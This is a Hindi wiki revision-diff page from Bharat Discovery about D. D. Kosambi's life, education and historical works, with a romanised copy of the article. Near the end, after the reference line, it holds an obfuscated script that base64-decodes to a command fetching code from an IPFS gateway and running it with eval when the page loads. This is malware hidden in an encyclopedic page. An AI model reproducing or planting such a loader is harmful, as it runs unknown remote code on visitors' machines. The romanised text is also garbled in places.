Difference between revisions of "दामोदर धर्मानंद कोसांबी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''दामोदर धर्मानंद कोसांबी''' (जन्म- [[31 जुला...' के साथ नया पन्ना बनाया)
 
Line 4: Line 4:
 
दामोदर धर्मानंद कोसांबी का जन्म 31 जुलाई, 1907 ई. को [[गोवा]] में हुआ था। धर्मानंद प्राचीन भारतीय इतिहास के प्रसिद्ध विद्वान, भाषा-वैज्ञानिक और गणितज्ञ माने जाते थे। दामोदर के पिता [[बौद्ध धर्म]] के प्रकांड विद्वान थे।
 
दामोदर धर्मानंद कोसांबी का जन्म 31 जुलाई, 1907 ई. को [[गोवा]] में हुआ था। धर्मानंद प्राचीन भारतीय इतिहास के प्रसिद्ध विद्वान, भाषा-वैज्ञानिक और गणितज्ञ माने जाते थे। दामोदर के पिता [[बौद्ध धर्म]] के प्रकांड विद्वान थे।
 
;शिक्षा
 
;शिक्षा
धर्मानंद कोसांबी [[अमेरिका]] के हारवर्ड विश्वविद्यालय में अध्यापक थे। अत: दामोदर की सारी शिक्षा अमेरिका में हुई। उनके अध्यन के मुख्य विषय थे-[[गणित]], [[इतिहास]] और भाषा विज्ञान। शिक्षा पूरी करने के बाद उन्होंने कुछ वर्षों तक [[काशी हिन्दू विश्वविद्यालय]] और [[अलीगढ़ मुस्लिम विश्वविद्यालय]] में अध्यापन किया और उसके बाद 1932 में गणित के प्रोफेसर बनकर [[पूना]] के फरग्यूसन कॉलेज चले गए। 1946 में उन्हें 'टाटा इंस्टीट्यूट ऑफ फंडामेंटल रिसर्च' में आमंत्रित किया गया जहाँ वे 16 वर्ष तक काम करते रहे।
+
धर्मानंद कोसांबी [[अमेरिका]] के हारवर्ड विश्वविद्यालय में अध्यापक थे। अत: दामोदर की सारी शिक्षा अमेरिका में हुई। उनके अध्यन के मुख्य विषय थे-गणित, इतिहास और भाषा विज्ञान। शिक्षा पूरी करने के बाद उन्होंने कुछ वर्षों तक [[काशी हिन्दू विश्वविद्यालय]] और [[अलीगढ़ मुस्लिम विश्वविद्यालय]] में अध्यापन किया और उसके बाद 1932 में गणित के प्रोफेसर बनकर [[पूना]] के फरग्यूसन कॉलेज चले गए। 1946 में उन्हें 'टाटा इंस्टीट्यूट ऑफ फंडामेंटल रिसर्च' में आमंत्रित किया गया जहाँ वे 16 वर्ष तक काम करते रहे।
 
==योगदान==  
 
==योगदान==  
 
गणित के अतिरिक्त उनका उल्लेखनीय योगदान प्राचीन भारतीय इतिहास और [[संस्कृति]] के क्षेत्र में रहा है। उनके निम्नलिखित [[ग्रंथ]] बहुत प्रसिद्ध हैं-'मिथ एंड रियलिटी' 'स्टडीज़ इन द फार्मेशन ऑफ इंडियन कल्वर' और 'द कल्वर एंड सिविलाइज़ेशन ऑफ़ एंशेंट इंडिया इन हिस्टोरिकल आउटलाइन'। उन्होंने पश्चिम के इतिहासकारों की इस स्थापना का तर्कपूर्ण खंडन किया कि [[भारत]] की पुरानी सभ्यता बाहरी प्रभाव का परिणाम है। कोसांबी की मान्यता थी कि भारत की अपनी आंतरिक परिस्थितियों का परिणाम था।  
 
गणित के अतिरिक्त उनका उल्लेखनीय योगदान प्राचीन भारतीय इतिहास और [[संस्कृति]] के क्षेत्र में रहा है। उनके निम्नलिखित [[ग्रंथ]] बहुत प्रसिद्ध हैं-'मिथ एंड रियलिटी' 'स्टडीज़ इन द फार्मेशन ऑफ इंडियन कल्वर' और 'द कल्वर एंड सिविलाइज़ेशन ऑफ़ एंशेंट इंडिया इन हिस्टोरिकल आउटलाइन'। उन्होंने पश्चिम के इतिहासकारों की इस स्थापना का तर्कपूर्ण खंडन किया कि [[भारत]] की पुरानी सभ्यता बाहरी प्रभाव का परिणाम है। कोसांबी की मान्यता थी कि भारत की अपनी आंतरिक परिस्थितियों का परिणाम था।  
Line 23: Line 23:
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व]]
 
[[Category:प्रसिद्ध व्यक्तित्व]]
 +
[[Category:गोवा]]
 
[[Category:चरित कोश]]
 
[[Category:चरित कोश]]
 
[[Category:नया पन्ना अक्टूबर-2011]]
 
[[Category:नया पन्ना अक्टूबर-2011]]

Revision as of 09:32, 30 October 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

damodar dharmanand kosaanbi (janm- 31 julaee, 1907; mrityu- 29 joon, 1966) prachin bharatiy itihas ke prasiddh vidvan, bhasha-vaijnanik aur ganitajn the.

jivan parichay

damodar dharmanand kosaanbi ka janm 31 julaee, 1907 ee. ko gova mean hua tha. dharmanand prachin bharatiy itihas ke prasiddh vidvan, bhasha-vaijnanik aur ganitajn mane jate the. damodar ke pita bauddh dharm ke prakaand vidvan the.

shiksha

dharmanand kosaanbi amerika ke haravard vishvavidyalay mean adhyapak the. at: damodar ki sari shiksha amerika mean huee. unake adhyan ke mukhy vishay the-ganit, itihas aur bhasha vijnan. shiksha poori karane ke bad unhoanne kuchh varshoan tak kashi hindoo vishvavidyalay aur aligadh muslim vishvavidyalay mean adhyapan kiya aur usake bad 1932 mean ganit ke prophesar banakar poona ke pharagyoosan k aaulej chale ge. 1946 mean unhean 'tata ianstityoot aauph phandameantal risarch' mean amantrit kiya gaya jahaan ve 16 varsh tak kam karate rahe.

yogadan

ganit ke atirikt unaka ullekhaniy yogadan prachin bharatiy itihas aur sanskriti ke kshetr mean raha hai. unake nimnalikhit granth bahut prasiddh haian-'mith eand riyaliti' 'stadiz in d pharmeshan aauph iandiyan kalvar' aur 'd kalvar eand sivilaizeshan aauf eansheant iandiya in historikal autalain'. unhoanne pashchim ke itihasakaroan ki is sthapana ka tarkapoorn khandan kiya ki bharat ki purani sabhyata bahari prabhav ka parinam hai. kosaanbi ki manyata thi ki bharat ki apani aantarik paristhitiyoan ka parinam tha.

nidhan

prasiddh vidvan damodar dharmanand kosaanbi ka nidhan 29 joon, 1966 ko hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sharma, liladhar bharatiy charit kosh (hindi). bharat diskavari pustakalay: shiksha bharati, dilli, prishth 379.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


bahari k diyaan

sanbandhit lekh